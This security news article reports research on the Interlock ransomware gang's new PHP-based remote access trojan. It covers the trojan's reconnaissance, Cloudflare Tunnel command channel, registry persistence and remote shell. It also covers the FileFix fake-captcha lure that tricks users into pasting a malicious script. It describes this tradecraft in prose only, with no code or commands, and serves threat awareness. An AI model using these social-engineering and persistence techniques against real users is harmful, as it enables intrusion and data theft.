The Interlock ransomware gang has been detected targeting organizations with a new remote access trojan (RAT) in a widespread campaign, according to researchers from The DFIR Report in partnership with Proofpoint.
The new malware, observed since June 2025, uses the general purpose PHP programming language. This differs from the previously identified JavaScript-based ‘NodeSnake’ RAT deployed by Interlock.
In certain cases, the deployment of the PHP variant of the Interlock RAT has led to the deployment of the Node.js version.
PHP is a common web scripting language, which can be leveraged across various platforms and databases.
“This discovery highlights the continued evolution of the Interlock group’s tooling and their operational sophistication. While the Node.js variant of Interlock RAT was known for its use of Node.js, this variant leverages PHP, a common web scripting language, to gain and maintain access to victim networks,” the researchers wrote.
Interlock ransomware gang was first detected operating in the second half of 2024. The criminal group primarily uses double-extortion tactics, in which it both encrypts and threatens to publish data unless an extortion demand is paid.
It has been linked to a number of attacks on government bodies in the US and UK, resulting in major data breaches.
New RAT Used for a Range of Functions
The analysis by The DFIR Report, published on 14 July, found that upon execution the new RAT version immediately performs automated reconnaissance of the compromised system.
To do so, it uses a series of PowerShell commands to gather and exfiltrate a comprehensive system profile as JSON data. The information collected includes detailed system specifications, a list of all running processes and associated services and running Windows services.
The malware also checks its own privilege level to determine if it is running as a user, admin or system, allowing the threat actor to instantly understand the context of the compromise.
The RAT then establishes a command and control channel with the attackers’ infrastructure, abusing the legitimate Cloudflare Tunnel service to mask the true location of the C2 server.
The malware contains hardcoded fallback IP addresses to enable communication to be maintained even if the Cloudflare Tunnel is disrupted.
It can perform a range of commands, including:
- Executing malicious files
- Setting itself up for persistence by adding an entry to the Windows Registry’s “Run” key
- Executing any shell command the attacker sends, giving them a remote command prompt on the victim’s machine
- Using the Remote Desktop Protocol (RDP) to move throughout
- Shutting itself down
FileFix Technique Used to Gain Initial Access
The PHP Interlock RAT version was observed as part of a wider Interlock campaign which has been active since at least May 2025.
This campaign targets a broad range of industries, according to the researchers.
The attackers leverage a technique known as FileFix to gain initial access.
FileFix is an evolution on the ClickFix social engineering technique, which uses a fake error or verification message to manipulate victims into copying and pasting a malicious script and then running it.
Both techniques rely on convincing the user to carry out the attack for the adversary. However, rather than using a dialog box, with FileFix, users are tricked into pasting a malicious file path into Windows File Explorer’s address bar.
The Interlock campaign uses compromised websites injected with a single-line script hidden in the page’s HTML, often unbeknownst to site owners or visitors.
The linked JavaScript employs heavy IP filtering to serve the payload, which first prompts the user to click a captcha to “Verify you are human” followed by “Verification steps” to open a run command and paste in from the clipboard.
If pasted into the run command it will execute a PowerShell script which eventually leads to Interlock RAT.
